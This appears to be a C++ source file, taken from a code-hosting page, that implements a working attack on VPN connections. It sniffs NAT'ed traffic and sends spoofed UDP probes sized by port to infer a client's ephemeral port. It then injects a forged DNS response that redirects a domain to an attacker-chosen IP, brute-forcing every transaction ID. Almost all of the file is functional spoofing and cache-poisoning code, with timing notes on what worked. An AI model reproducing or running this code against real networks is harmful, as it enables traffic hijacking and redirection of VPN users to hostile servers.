You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
 
 
 
 
 
 

619 lines
16 KiB

#include <tins/tins.h>
#include <cassert>
#include <iostream>
#include <string>
#include <unistd.h>
#include <thread>
#include <random>
using std::thread;
using std::cout;
using std::string;
using std::vector;
using namespace Tins;
int current_spoof_port, best_port, chack_count, resp_count, sniff_size;
bool is_running = true;
bool verbose = false;
bool count_resp = false;
bool scanning = false;
bool injecting = false;
bool sniffed_resp = false;
string dest_ip;
string source_ip;
void print_start() {
cout << "meep\n";
usleep(1000000 / 2);
cout << "meep\n";
usleep(1000000 /2);
cout << R"(
__
/ \ __
.---. _ / / _.~ \
\ `. / \ / /.-~ __/
`\ \ | | |/ .-~ __
\ \ | | | .'--~~ \
\ \ | | ` ' _______/
\ \ | ` /
.--. \ \ | ` /
\ `.\ \ \ /
`\ \ \ `\ (
\ \ \ > ,-.-.
\ `. \ / | \ \
\ . \ /___| O |O\ ,
.-. \ ; | /` `^-.\.-'`--'/
\ `; | | /
`\ \ | `. `--..____,'
\ `. | `._ _.-'^
\ . / `|`|`
.-.\ / | |
\ `\ / | |
`\ ` | | |
\ | | |
.-. | | |
\ `. \ | |
`\ \ | |
\ \ | |
\_____ :-'~~~~~'-' ;
/____;``-. :
<____( `. ;
\___\ ; .'
/``--'~___.-'
/\___/^/__/
/ /' /`/'
\ \ `\ \
`\ \ \ \
\ \ \ \
\ \ \ \
\ \ \ \ ______
\ \ ___\ \'~``______)>
\ \___ _______ __)>
_____\ \'~``______)>
<(_______.._______)>
)";
usleep(1000000);
}
void print_divider(int count) {
int i = 0;
while (i < count) {
if (verbose) cout << "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
i++;
}
}
void print_time() {
int res = system("date");
}
// Used by thread to keep track of last port
// we spoofed to
//
bool handle_send_packet(PDU &some_pdu) {
const IP &ip = some_pdu.rfind_pdu<IP>(); // Grab IP layer of sniffed packet
if (ip.src_addr() == source_ip) current_spoof_port = some_pdu.rfind_pdu<UDP>().dport();
return is_running;
}
// Used by sniffing thread to look for packets
// NAT'ed back to the client that we may have
// spoofed
//
bool handle_packet(PDU &some_pdu) {
const IP &ip = some_pdu.rfind_pdu<IP>(); // Grab IP layer of sniffed packet
// should be looking for a packet from the VPN server and to the VPN client
//
// src ip will be the VPN server and dest ip will be the public address
// of the VPN client
if (ip.src_addr() == dest_ip && !injecting) { // dest_ip should be public VPN IP
const uint32_t& payload = some_pdu.rfind_pdu<RawPDU>().payload_size();
//cout << "sniffed packet going from VPN server with port: " << current_spoof_port << ", size: " << payload << " \n";
// 97 is the size of empty UDP packet NAT'ed back to the client so only look for packets that are bigger
//
if (payload >= 97 && payload != 147) { // could be a NAT'ed attacker packet
if (verbose) cout << "sniffed response from VPN server with port: " << current_spoof_port << ", size: " << payload << " \n";
best_port = current_spoof_port;
sniff_size = payload - 97;
sniffed_resp = true;
if (count_resp) resp_count ++;
}
}
return is_running;
}
// Start sniffing things on one of the
// attack router interfaces
//
void sniff_stuff() {
SnifferConfiguration config;
config.set_promisc_mode(true);
Sniffer sniffer("enp0s8", config);
sniffer.sniff_loop(handle_packet);
}
// Sniff outgoing interface for packets we send
// to get a better approx of the last packet sent
//
void sniff_send_stuff() {
SnifferConfiguration config;
config.set_promisc_mode(true);
Sniffer sniffer("any", config);
sniffer.sniff_loop(handle_send_packet);
}
// Generate random string of some length to send
// in attack probes
//
std::string random_string(std::size_t length) {
const std::string CHARACTERS = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
std::random_device random_device;
std::mt19937 generator(random_device());
std::uniform_int_distribution<> distribution(0, CHARACTERS.size() - 1);
string random_string;
for (std::size_t i = 0; i < length; ++i) {
random_string += CHARACTERS[distribution(generator)];
}
return random_string;
}
// Spread udp packets across a given port
// range while increasing the size each time
//
int port_spread(string source_ip, int sport, string dest_ip, int start_port, int end_port) {
PacketSender sender;
NetworkInterface iface("enp0s9");
IP pkt = IP(dest_ip, source_ip) / UDP(40409, sport);
UDP& udp = pkt.rfind_pdu<UDP>();
int current_port = best_port;
int spoof_port = start_port;
int send_size = 0;
int send_count = 0;
string send_payload = random_string(send_size);
cout << "spreading the port range from " << start_port << " to " << end_port << " with udps..\n";
while (spoof_port < end_port && !sniffed_resp) {
IP pkt = IP(dest_ip, source_ip) / UDP(spoof_port, sport) / RawPDU(send_payload);
current_spoof_port = spoof_port;
//udp.dport(spoof_port); // set the packets dest port to current guess
int round_sends = 0;
while (round_sends < 4) { // send 4 at a time then sleep again
IP pkt = IP(dest_ip, source_ip) / UDP(spoof_port, sport) / RawPDU(send_payload);
udp.dport(spoof_port);
current_spoof_port = spoof_port;
sender.send(pkt, iface);
spoof_port++;
send_size ++;
round_sends ++;
send_payload = random_string(send_size);
if (send_size >= 1000) { // reset probe size back to 0 on every 1000th port
send_size = 0;
if (verbose) cout << "Sent w size 1000 to " << spoof_port << "\n";
}
}
// if the payload size reaches 1000 (max), reset back to 0
if (send_size >= 1000) {
send_size = 0;
if (verbose) cout << "Sent w size 1000 to " << spoof_port << "\n";
}
usleep(25); // scan send delay *** working w 30 before
}
if (!sniffed_resp) usleep(1000000 / 3); // wait a third of a second just in case it was at the very top of the port range (i.e. ~61k)
current_port = best_port;
if (verbose) cout << "finished round 1 w guessed port: " << current_port << "\n";
if (verbose) cout << "size of round 1 response: " << sniff_size << "\n";
if (!sniffed_resp) current_port = 0;
return current_port;
}
// Send to the range of approximate ports
// again with different sizes to find the exact
// one in use
//
int find_exact_port(int block_port, int last_port, int last_size, string source_ip, int sport, string dest_ip) {
// Using the size of the first round response we know we're within
// about 16 ports of the exact one in use but because of the delay it
// could be in one of a few different 1k blocks
PacketSender sender;
NetworkInterface iface("enp0s9");
int block_start = block_port - 10000 + last_size; // start 10 thousand blocks back plus the sniff size
int spoof_port = block_start - 3;
int max_port = spoof_port + 16; // only check 16 ports in each thousand block
int send_size = 0;
int current_port = 0;
string send_payload = random_string(0);
sniffed_resp = false;
IP pkt = IP(dest_ip, source_ip) / UDP(40409, sport);
UDP& udp = pkt.rfind_pdu<UDP>();
while (!sniffed_resp && spoof_port < (block_port + 1000)) {
send_payload = random_string(send_size);
IP pkt = IP(dest_ip, source_ip) / UDP(spoof_port, sport) / RawPDU(send_payload);
current_spoof_port = spoof_port;
udp.dport(spoof_port); // set the packets dest port to current guess
if (verbose) cout << "sending to port: " << (spoof_port) << " w size: " << send_size << "\n";
sender.send(pkt, iface);
spoof_port++;
send_size += 5;
if (spoof_port > max_port) {
spoof_port += (1000 - 17); // jump to the next thousand block
max_port = spoof_port + 16;
}
usleep(2000);
}
while (!sniffed_resp) {
usleep(500000);
if (verbose) cout << "waiting for round 2 resp..\n";
}
current_port = best_port;
if (verbose) cout << "size of round 2 response: " << sniff_size << "\n";
if (verbose) print_divider(2);
bool found = false;
// Go over the exact same loop as round 2 without sending
// until we find the port that would have triggered the size
// that was sniffed
spoof_port = block_start - 3;
max_port = spoof_port + 16;
send_size = 0;
while (!found && spoof_port < (block_port + 1000)) {
if (send_size > sniff_size) {
// we just passed the port that matched the connection
if (verbose) cout << "port on size match: " << spoof_port << "\n";
current_port = spoof_port;
found = true;
}
spoof_port++;
send_size += 5;
if (spoof_port > max_port) {
spoof_port += (1000 - 17);
max_port = spoof_port + 16;
}
}
// Do one final scan within +-3 ports of approx to make sure
// we have the exact port in use
int start_port = current_port - 3;
spoof_port = start_port;
max_port = spoof_port + 6;
send_size = 0;
sniffed_resp = false;
while (!sniffed_resp && spoof_port < max_port) {
send_payload = random_string(send_size);
IP pkt = IP(dest_ip, source_ip) / UDP(spoof_port, sport) / RawPDU(send_payload);
current_spoof_port = spoof_port;
udp.dport(spoof_port); // set the packets dest port to current guess
if (verbose) cout << "sending final round spoof to port: " << (spoof_port) << " w size: " << send_size << "\n";
sender.send(pkt, iface);
spoof_port += 1;
send_size += 240;
}
while (!sniffed_resp) {
usleep(500000);
if (verbose) cout << "waiting for final exact scan resp..\n";
}
current_port = best_port;
if (verbose) cout << "size of final exact response: " << sniff_size << "\n";
int exact = start_port + (sniff_size / 240);
//cout << "FINAL EXACT PORT: " << exact << "\n\n";
return exact;
}
// Spread udp packets across a port range to find the estimated
// port in use that forwards packet back to the client, then repeat the
// scan in the estimated range to find the exact one in use
//
int scan_for_port(string source_ip, int sport, string dest_ip, int start_port, int end_port) {
PacketSender sender;
NetworkInterface iface("enp0s9");
int i;
// Find the estimated port
scanning = true;
int current_port = port_spread(source_ip, sport, dest_ip, start_port, end_port);
scanning = false;
if (current_port == 0) return 0;
int j = 0;
int exact_port = 0;
if (verbose) print_divider(2);
sniffed_resp = false;
cout << "estimated port: " << current_port << " w sniff size: " << sniff_size << "\n";
int last_port = current_port;
int block_port = last_port;
while (block_port % 1000 != 0) {
block_port --;
}
if (verbose) cout << "highest port block: " << block_port << "\n";
// Find the exact port in use
int exact = find_exact_port(block_port, last_port, sniff_size, source_ip, sport, dest_ip);
if (verbose) cout << "some exact port? " << exact << "\n";
exact_port = exact;
return exact_port;
}
// Not used now but could be added to recheck X times that a
// port is truly in use and forwarding packets back to the client
//
int recheck_port(int num_checks, int approx_port, string source_ip, int sport, string dest_ip) {
PacketSender sender;
NetworkInterface iface("enp0s9");
IP pkt = IP(dest_ip, source_ip) / UDP(40409, sport); /// RawPDU("long message here actually a whole lot longer than the other one");
UDP& udp = pkt.rfind_pdu<UDP>();
bool is_found = false;
int curr_port = approx_port - 1;
while (!is_found){
cout << "rechecking port: " << curr_port << "\n";
udp.dport(curr_port); // set the packets dest port to current guess
for (int i = 0; i < num_checks; i ++) {
sender.send(pkt, iface);
usleep(1000);
}
if (resp_count == num_checks) {
is_found = true;
} else {
curr_port ++;;
usleep(300000);
}
}
int final_port = best_port;
int other_final = curr_port - 1;
cout << "maybe better final approx? " << other_final << "\n";
return final_port;
}
// Attempt to inject the dns response to the given 4 tuple (src_ip, sport, dest_ip, dport)
// while cycling through all possible txIDs for the dns reply
//
int send_dns(string src_ip, int sport, string dest_ip, int dport) {
PacketSender sender;
NetworkInterface iface("enp0s10");
IP pkt = IP(dest_ip, src_ip) / UDP(dport, sport) / DNS();
cout << "Attempting to inject dns response on port " << dport << "\n\n";
string spoof_domain = "yo.com";
string redirect_ip = "22.22.22.22";
injecting = true;
// Add the fake response
pkt.rfind_pdu<DNS>().add_query({ spoof_domain, DNS::A, DNS::IN });
pkt.rfind_pdu<DNS>().add_answer(
DNS::resource(
spoof_domain,
redirect_ip, // some bad guy IP we wanna redirect to
DNS::A,
1, // class of the record??
// 777 is just a random TTL
777
)
);
// We want the query to be resolverd recursively
pkt.rfind_pdu<DNS>().type(DNS::QRType::RESPONSE);
pkt.rfind_pdu<DNS>().recursion_desired(1);
pkt.rfind_pdu<DNS>().recursion_available(1);
int round_sends = 0;
int id = 1;
int num_blocks = 6;
int block_size = int(65535 / num_blocks); // 65535 is max transaction id for dns
while (id < block_size) { // try every txId in the block
int send_id = id;
while (round_sends < num_blocks) { // send once to each block
pkt.rfind_pdu<DNS>().id(send_id); // set the transaction id guess
sender.send(pkt, iface);
send_id += block_size;
round_sends ++;
}
if (id % 1000 == 0) cout << "sending dns response w id: " << id << "\n";
id ++;
round_sends = 0;
usleep(100); // was working 100% w 250
}
return 1;
}
int find_ports(string source_ip, int sport, string dest_ip, int start_port, int end_port) {
bool is_found = false;
int current_port = 0;
int last_port = start_port;
while (!is_found) {
sniffed_resp = false;
print_time();
int exact_port = scan_for_port(source_ip, sport, dest_ip, last_port, end_port);
print_divider(2);
if (exact_port == 0) is_found = true;
else {
cout << "found some exact port: " << exact_port << "\n\n";
print_time();
send_dns(source_ip, sport, dest_ip, exact_port);
usleep(1000000);
injecting = false;
}
resp_count = 0;
print_divider(1);
int next_port = exact_port + 2;
while (next_port % 1000 != 0) {
next_port ++;
}
last_port = next_port;
}
return 1;
}
int main(int argc, char** argv) {
if (argc != 6) {
cout << "sike wrong number of args ---> (source_ip, sport, dest_ip, start_port, end_port)\n";
return 0;
}
source_ip = argv[1]; // dns server IP
int sport = atoi(argv[2]); // most likely 53
dest_ip = argv[3]; // vpn server IP
verbose = true;
int start_port = atoi(argv[4]); // Linux ephemeral range is (32768, 60999)
int end_port = atoi(argv[5]);
print_divider(2);
thread sniff_thread(sniff_stuff);
thread send_sniff_thread(sniff_send_stuff);
int res = find_ports(source_ip, sport, dest_ip, start_port, end_port);
//sniff_thread.join();
//send_sniff_thread.join();
sniff_thread.detach();
send_sniff_thread.detach();
return 1;
}